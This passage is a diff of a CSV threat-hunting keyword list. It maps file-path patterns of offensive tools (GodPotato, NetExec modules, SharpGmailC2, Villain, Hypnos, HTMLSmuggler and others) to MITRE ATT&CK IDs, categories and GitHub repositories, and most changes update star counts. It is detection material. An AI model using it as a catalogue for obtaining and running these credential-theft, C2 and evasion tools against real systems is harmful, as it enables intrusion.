 "*\glit-cli*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z"
 "*\gmailC2.exe*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z"
-"*\gocrack-1.0.zip*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1074","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z"
-"*\gocrack-master.*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1074","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z"
-"*\GodFault.*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z"
-"*\Godpotato\*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1186","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z"
+"*\gocrack-1.0.zip*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z"
+"*\gocrack-master.*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z"
+"*\GodFault.*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z"
+"*\Godpotato\*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z"
 "*\GoFetchLog.log*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","0","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z"
-"*\go-secdump*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","0","N/A","10","1","81","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z"
+"*\go-secdump*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","0","N/A","10","1","82","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z"
 "*\goZulipC2*","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","0","N/A","10","10","5","2","2023-08-31T12:06:58Z","2023-08-13T11:04:20Z"
-"*\GPOddity\*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z"
-"*\Group3r.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
-"*\Grouper2.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
-"*\GzipB64.exe*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*\GPOddity\*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z"
+"*\gpp_autologin.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\gpp_password.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\group_members.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\Group3r.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*\Grouper2.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*\groupmembership.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\GzipB64.exe*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
 "*\HackBrowserData*","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","0","N/A","10","10","148","21","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z"
 "*\Hades.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z"
 "*\hades.exe*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z"
 "*\hades-main.zip*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z"
-"*\handlekatz.exe*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z"
+"*\handlekatz.exe*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\handlekatz.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
 "*\harvest.cmb*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z"
-"*\hashview.py*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","319","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z"
-"*\HiddenDesktop\*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","925","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z"
-"*\hijackers\*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
-"*\HijackHunter\*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
-"*\hoaxshell\*.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z"
-"*\HookDetector.csproj*","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR ","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
-"*\HookDetector.exe*","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR ","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*\hash_spider.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\hashview.py*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z"
+"*\HiddenDesktop\*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z"
+"*\hijackers\*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*\HijackHunter\*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*\hoaxshell\*.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*\HookDetector.csproj*","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR ","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*\HookDetector.exe*","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR ","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*\HostEnum.ps1*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","0","N/A","10","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" "*\HTMLSmuggler\*","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/D00Movenok/HTMLSmuggler","1","0","N/A","10","1","97","13","2023-09-13T22:26:51Z","2023-07-02T08:10:59Z" "*\huan.exe *","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. 
it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","0","N/A","N/A","6","518","103","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" -"*\HWSyscalls.cpp*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","173","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" -"*\HWSyscalls-Example.*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","173","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*\HWSyscalls.cpp*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*\HWSyscalls-Example.*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" "*\hyperion.exe*","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. 
The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*\Hypnos.exe*","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","10","1","49","5","2023-08-22T20:17:31Z","2023-07-11T09:07:10Z" "*\Hypnos.sln*","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","10","1","49","5","2023-08-22T20:17:31Z","2023-07-11T09:07:10Z" 
@@ -6174,119 +6263,150 @@ "*\icebreaker.py*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*\IDiagnosticProfileUAC*","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","0","N/A","10","2","173","32","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z" "*\iis_controller.py*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" -"*\impacket.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - 